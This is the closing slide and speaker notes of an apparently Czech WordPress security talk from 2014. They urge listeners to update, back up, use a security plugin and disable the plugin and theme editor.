  • 40. A to je vše, přátelé. aktualizujte, zálohujte, používejte bezpečnostní plugin, buďte opatrní http://lynt.cz 22. 9. 2014 40

Notas do Editor

  1. Kdo ma vps/hosting, kdo ma bezpecnosnti plugin, kdo resil incident
  2. Zakázat editor pluginů a šablon